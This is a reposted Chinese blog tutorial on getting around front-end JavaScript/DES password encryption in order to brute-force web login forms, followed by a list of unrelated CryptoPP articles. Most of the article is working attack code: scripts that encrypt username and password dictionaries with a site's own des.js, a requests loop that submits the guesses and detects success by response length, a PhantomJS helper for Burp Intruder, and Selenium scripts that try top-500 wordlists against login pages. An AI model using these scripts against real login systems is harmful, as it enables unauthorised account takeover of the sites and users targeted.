cryptopp des加密文件_突破前端加密方法总结

最新推荐文章于 2024-01-25 14:51:52 发布
最新推荐文章于 2024-01-25 14:51:52 发布
阅读量345 收藏
点赞数
文章标签: cryptopp des加密文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30789475/article/details/112324447
版权

0x00 执行加密的js文件生成加密内容

如 https://yyy.xxx.com/assets/des/des.js

f09c56cfa55b628ad7284f98136d3ed6.png

对密码(123456)进行了前端加密传输。

8a3143bb17e9fdca7d177f5183b263cc.png

这里还需要从页面源代码找到加密方法的参数

b7d60b0e50228648d1a412d8f10b0e42.png

pip install PyExecJS

再安装PhantomJS(可选),或者用默认的js解析引擎也行。(execjs.get().name)

加密脚本:生成加密后的用户名和密码

#coding:utf-8#from selenium import webdriverimport execjsdef mzDes(s,para):despara = execjs.get('phantomjs').compile(s).call("strEnc",para,"csc","mz","2017")return desparawith open('des.js','r') as mzCrypto:s = mzCrypto.read()with open('users.txt','r') as users:   #des usernamewith open('des_users.txt','w') as f4DesUser:user = users.readlines()for u in user:uname = u.strip()print unamedesUsername = mzDes(s,uname)print desUsernamef4DesUser.write(desUsername+'\n')with open('pwdTop54.txt','r') as pwds:   #des passwordwith open('des_pwds.txt','w') as f4DesPwd:pwd = pwds.readlines()for p in pwd:passwd = p.strip()print passwddesPassword = mzDes(s,passwd)print desPasswordf4DesPwd.write(desPassword+'\n')

67808d899af7d2bd48cbbaff55258d81.pnge27921656de27d4e512e72977c04530e.png

这样就可以利用burpsuite/python脚本加载加密后的字典愉快的爆破啦。

py脚本爆破(单线程):

#coding:utf-8#from selenium import webdriverimport execjsimport requestsimport resuccessCount = 0def mzDes(s,para):despara = execjs.get().compile(s).call("strEnc",para,"csc","mz","2017")return desparawith open('des.js','r') as mzCrypto:s = mzCrypto.read()with open('users.txt','r') as users:   #des usernameuser = users.readlines()for u in user:with open('top50.txt','r') as pwds:   #des passworduname = u.strip()print unamedesUsername = mzDes(s,uname)print desUsernamepwd = pwds.readlines()for p in pwd:passwd = p.strip()print passwddesPassword = mzDes(s,passwd)print desPasswordburp0_url = "https://yyy.xxx.com:443/login"burp0_cookies = {"acw_tc": "2", "session.id": "5e"}burp0_headers = {"User-Agent": "Mozilla/5.0 Firefox", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://yyy.xxx.com", "Connection": "close", "Referer": "https://yyy.xxx.com/login", "Upgrade-Insecure-Requests": "1"}burp0_data = {"usernumber": "test", "username": desUsername, "password": desPassword, "geetest_challenge": "caaf52fec"}rsp = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)#print rsp.headers['content-length']#if rsp.headers['content-length'] != 23862:#   print 'success!!!'print len(rsp.content)if len(rsp.content) != 23862:print 'success'successCount = successCount + 1pattern = re.compile(r'

(.*?)

')bruteResult = pattern.search(rsp.text)print bruteResultprint successCount

0fba869b18f78c617567622405947a76.png

如果遇到结合了动态因子(cookie或请求参数的某动态值)加密的,如key = substr(0,8,xsession),就要根据实际情况写爆破脚本了。

0x01 burpsuite插件jsencrypt

安装phantomjs

https://github.com/c0ny1/jsEncrypter

用法参考readme

编写对应的jsEncrypter_des.js

var webserver = require('webserver');server = webserver.create();var host = '127.0.0.1';var port = '1664';// 加载实现加密算法的js脚本var wasSuccessful = phantom.injectJs('des.js');/*引入实现加密的js文件*/// 处理函数function js_encrypt(payload){var newpayload;/**********在这里编写调用加密函数进行加密的代码************///var b = new Base64();newpayload = strEnc(payload,"key","para0","para1");/**********************************************************/return newpayload;}if(wasSuccessful){console.log("[*] load js successful");console.log("[!] ^_^");console.log("[*] jsEncrypterJS start!");console.log("[+] address: http://"+host+":"+port);}else{console.log('[*] load js fail!');}var service = server.listen(host+':'+port,function(request, response){try{if(request.method == 'POST'){var payload = request.post['payload'];var encrypt_payload = js_encrypt(payload); console.log('[+] ' + payload + ':' + encrypt_payload);response.statusCode = 200;response.write(encrypt_payload.toString());response.close();}else{response.statusCode = 200;response.write("^_^\n\rhello jsEncrypter!");response.close();}}catch(e){console.log('\n-----------------Error Info--------------------')var fullMessage = "Message: "+e.toString() + ':'+ e.line;for (var p in e) {fullMessage += "\n" + p.toUpperCase() + ": " + e[p];} console.log(fullMessage);console.log('---------------------------------------------')console.log('[*] phantomJS exit!')phantom.exit();}   });

234cf73bea82877da42fd5fcb2d1a21d.png

0x02 理解js加密算法

如md5/sha1,直接写py脚本即可,复杂一点的就要调试js了

f5e2513f9892536ee981c086c352f80a.png

burpsuite的intruder模块自带了很多加密的选项可以直接用

c7e0eac7ba71480ea321a53118f81b46.png

0x03 浏览器自动化爆破

安装selenium
安装浏览器驱动,加入环境变量。

#coding:utf-8import timeimport sysfrom selenium import webdriverreload(sys) sys.setdefaultencoding('utf-8')def BruteLogin(user,pwd):browser.get('http://xxx.cn/manage/login.aspx')browser.implicitly_wait(7)elem = browser.find_element_by_name("name")elem.send_keys(user)elem=browser.find_element_by_name("pws")elem.send_keys(pwd)elem=browser.find_element_by_id("submit")#print browser.current_window_handleelem.click()time.sleep(1)if '当前用户' in browser.page_source:print 'Login Success:' + user + '|' + pwdsys.exit()else:print 'LoginFaild!'browser = webdriver.Chrome()def main():with open('usernameTop500.txt','r') as fuser:for user in fuser.readlines():u = user.strip()with open('topwdglobal.txt','r') as fpwd:for pwd in fpwd.readlines():p = pwd.strip()print 'testing...' + u,pBruteLogin(u,p)browser.quit()if __name__ == '__main__':main()

8620eb26437c1b293b06b0af7e2b225a.gif

如果有些元素不能直接定位,就尝试用autochain,如:

#coding:utf-8#Author:LSA#Descript:selenium for brute#Data:201812import timeimport sysfrom selenium import webdriverfrom selenium.webdriver.common import action_chains, keysimport timereload(sys) sys.setdefaultencoding('utf-8')def BruteLogin(user,pwd):browser.get('http://xxx.edu.cn/login.jsp')browser.implicitly_wait(20)action = action_chains.ActionChains(browser)elem = browser.find_element_by_name("j_username")elem.send_keys(user)action.perform()elem=browser.find_element_by_name("j_password")elem.send_keys(pwd)action.perform()elem=browser.find_element_by_name("btn_submit")#print browser.current_window_handle#elem.click()action.send_keys("document.getElementsByName('btn_submit')[0].click()"+keys.Keys.ENTER)action.perform()time.sleep(1)if '当前用户' in browser.page_source:print 'Login Success:' + user + '|' + pwdsys.exit()else:print 'LoginFaild!'browser = webdriver.Chrome()def main():with open('usernameTop500.txt','r') as fuser:for user in fuser.readlines():u = user.strip()with open('topwdglobal.txt','r') as fpwd:for pwd in fpwd.readlines():p = pwd.strip()print 'testing...' + u,pBruteLogin(u,p)browser.quit()if __name__ == '__main__':main()

0x04 misc

  2. 中间服务器:自己搭一个服务及作为中继进行加密再发给目标服务器,较麻烦。

  4. 断点调试js修改参数

  6. fiddler替换js

可视具体情况使用。

//预览看到代码缩进没了,全部py脚本打包到附件了

https://xzfile.aliyuncs.com/upload/affix/20200206161837-4690f6bc-48b9-1.zip

来自先知社区:https://xz.aliyun.com/t/7190

6ebd743f842703d8467a7bae6c642183.png

可见迪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cryptopp des加密文件_Crypto++入门学习笔记(DES、AES、RSA、SHA-256)
weixin_39814454的博客
12-21 768
Crypto++是个免费的C++加解密类库,由于资格太老、持续更新,最新版本到了CryptoPP 5.6,对天缘而言,第一眼看到CryptoPP就感觉头大,根目录下放置大量单源文件、编译文件、项目文件,再加上多平台和多编译器支持,文件几乎又多了一倍,而且还是都混到一起,直接就让人望而却步。毕竟Crypto是个功能完整,且经过大量用户使用考验的开源库。所以,皱眉学习汇总一下,遂成此文。本文测试环境:...
cryptopp des加密文件_C++ DES 加密Cryptopp ) | 学步园
weixin_39609166的博客
12-21 325
转载注明出处http://blog.csdn.net/xugangjava写了一个DES加密的插件,用的是crypto++库,各种字符的转换有点晕插件是ATL的Activex 只贴出关键代码,希望对你有用,如有不足欢迎指出。//加密代码STDMETHODIMP CMAddr::En(BSTR instr, BSTR* outstr){CComBSTR com_instr(instr);if(com...
cryptoppdes加密解密
05-01
用vc6写的一个利用cryptopp类库做的一个des加密解密的例子,希望对正在使用cryptopp类库朋友有所帮助。
C++使用CryptoPP密码库之AES加密算法进行文件加密
最新发布
weixin_66143829的博客
01-25 1095
CryptoPP 是一个开源的密码学加密库,提供了大量的密码学算法和功能,包括对称加密、非对称加密、哈希函数、消息认证码 (MAC)、数字签名等。这里重点介绍一下对称加密算法(AES)的使用和注意事项。
DES破解
01-03
三重DES破解源程序
使用CryptoPP实现DES加密
07-02 5590
DesUtil.h#ifndef DESUTIL_H_ #define DESUTIL_H_ #include class DesUtil { private: const char *keystr; void Base64en(const unsigned char *ming, unsigned char* enstr); void Base64de(const unsigned
cryptopp565.zip_加密解密_Visual_C++_
08-11
总结来说,Cryptopp565是一个全面且强大的加密库,不仅包含多种加密算法,还提供了丰富的接口和优化措施。对于Visual C++开发者来说,它是实现安全功能的理想选择。通过深入学习和实践,我们可以更好地利用这个库来...
C++实现3Des算法.zip_3DES算法 C++_3des_C++_visual c_加密算法
07-13
首先,明文数据通过密钥K1进行初始的DES加密(E1),然后将得到的结果用密钥K2解密(D2),最后再用密钥K3(可以是K1或K2,取决于模式)进行一次加密(E3)。这样就完成了整个3DES加密过程。 3. **解密过程**:...
cryptopp800_crypto++8.00版加密库_CRYPTO_CryptoPPAES加密_
10-01
AES,全称为高级加密标准,是继DES之后的又一广泛使用的分组加密算法。它基于Rijndael算法,通过替换、混淆、扩展和轮函数等步骤,实现了数据的高效加密。AES支持不同长度的密钥,包括128位、192位和256位,其中128...
cryptopp-CRYPTOPP_6_0_0.zip_Cryptopp
07-14
1. **对称加密**:`cryptopp` 支持多种对称加密算法,如AES(高级加密标准)、DES(数据加密标准)、3DES(三重DES)、Blowfish等。这些算法用于在知道密钥的情况下对数据进行加密和解密。 2. **非对称加密**:也...
DES_对称加密_Des破解_des算法实现_
09-30
实现DES算法,DES是一种对称加密算法,所谓对称加密算法即:加密和解密使用相同密钥的算法。DES加密算法出自IBM的研究,后来被美国政府正式采用,之后开始广泛流传,但是近些年使用越来越少,因为DES使用56位密钥,以现代计算能力,24小时内即可被破解
基于cryptopp文件签名实现
09-11
基于cryptopp文件hash实现,包括MD5, SHA1,SHA224,SHA256,SHA384,SHA512,RIPEMD128,RIPEMD160,RIPEMD256,RIPEMD320,Whirlpool
des3_3des加密_
10-03
3des加密代码,使用MATLAB语言,可输入8字节明文
BurpCrypto:BurpCrypto是burpsuite加密插件的集合,支持AESRSADESExecJs(在burpsuite中执行JS加密代码)
03-19
BurpCrypto Burpcrypto是burpsuite加密插件的集合,支持AES / RSA / DES / ExecJs(在burpsuite中执行JS加密代码)。 用法 从下载预编译的jar包。 将此jar包添加到burpsuite的扩展中。 切换到BurpCrypto选项卡,选择您需要的Cipher选项卡。 设置键或某个值。 按“添加处理器”,并为此处理器命名。 切换到“入侵者”->“有效载荷”->“有效载荷处理”。 按“添加”,选择“调用Burp扩展名”,然后选择您刚创建的处理器。 按下“开始攻击”,玩得开心! 关键例子 Aes键(UTF8String):abcdefgabcdefg12 Aes IV(UTF8String):abcdefgabcdefg12 RSA X509键:MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC0hrRI
DES加密算法破解方法
weixin_30488313的博客
05-27 1375
转载自:http://www.vchome.net/tech/datastruct/datasf5.htm DES(数据加密标准)在1977年被美国国家标准技术协会认可成为均衡加密算法的标准,用于加密非机密的信息.des广泛应用于各个行业的加密领域,如银行业.这麽样一种古老的加密算法,到今天还有人在用,真是让人想不明白.这种按照摩尔定律早该淘汰的东西,怎么可能会没有办法破解呢?? 以...
C++ DES 加密Cryptopp
xugangjava的专栏
09-07 7220
转载注明出处 http://blog.csdn.net/xugangjava 写了一个DES加密的插件,用的是crypto++库,各种字符的转换有点晕 插件是ATL的Activex 只贴出关键代码,希望对你有用,如有不足欢迎指出。 //加密代码 STDMETHODIMP CMAddr::En(BSTR instr, BSTR* outstr) { CComBSTR com_i
cryptopp des加密文件_使用CryptoPP实现DES加密
weixin_39783426的博客
12-21 380
DesUtil.h#ifndef DESUTIL_H_#define DESUTIL_H_#include class DesUtil {private:const char *keystr;void Base64en(const unsigned char *ming, unsigned char* enstr);void Base64de(const unsigned char* mi, un...
cryptopp des加密文件_cryptopp开源库的使用(二):base64加密
weixin_29219189的博客
02-01 407
很多时候我只是优秀工具的使用者,优秀的工具用好了才能发挥作用最近使用cryptopp的base64对压缩后的zip文件内容进行加密遇到了问题。首先zip压缩没问题,可是最后得到的base64字符串不对:1、长度不对(问题应该是源字符串的问题)2、使用现成的工具解密得不到zip文件内容(问题没有头绪)既然没法从问题的表现来推理解决,那就从正常逻辑往后判断问题的根源点1、先检查zip的读取,利用fre...
前端密码:加密&解密(DES)
TooManyDdficulty的博客
04-01 737
在vue项目中使用crypto-js进行加解密 下载 npm i crypto-js --save 新建des.js文件des.js文件中 import cryptoJS from 'crypto-js' const key = 'abcdefg123456789' // DES加密 export const encryptDes = message => { const keyHex = cryptoJS.enc.Utf8.parse(key) const options =
cryptopp+des加密文件
04-16
你可以使用cryptopp库来进行DES加密文件。以下是一个简单的示例: #include #include <cryptopp/des.h> #include <cryptopp/modes.h> using namespace CryptoPP; int main() { // 加载明文文件 std::ifstream ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值